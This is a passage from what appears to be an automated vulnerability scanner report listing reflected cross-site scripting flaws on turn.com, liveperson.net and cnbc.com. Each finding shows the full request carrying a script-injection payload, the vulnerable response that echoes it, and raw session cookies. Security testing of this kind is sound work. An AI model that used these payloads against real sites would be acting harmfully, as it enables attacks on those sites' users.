DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1; uid=4325897289836481830; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:06:40 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7183228360285489408&rnd=8628582112585857178&fpid=5dd8b"><script>alert(1)</script>2f6aa4a4ce6&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.144. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa7d8"><script>alert(1)</script>b11e881158d was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=aa7d8"><script>alert(1)</script>b11e881158d&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1; uid=4325897289836481830; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7183228360285489408; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:06:43 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:06:42 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7183228360285489408&rnd=8687099866006709396&fpid=4&nu=n&t=&sp=aa7d8"><script>alert(1)</script>b11e881158d&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.145. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 3c119%0add7020c6f27 was submitted in the site parameter. This input was echoed as 3c119
dd7020c6f27 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=573866903c119%0add7020c6f27&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 66
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSASAQSDS=LBEHLHIALAABIBHKHHAOLKCH; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 573866903c119
dd7020c6f27
lpAddMonitorTag();

3.146. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 36c5e</title><script>alert(1)</script>2789f6ff334a89918 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

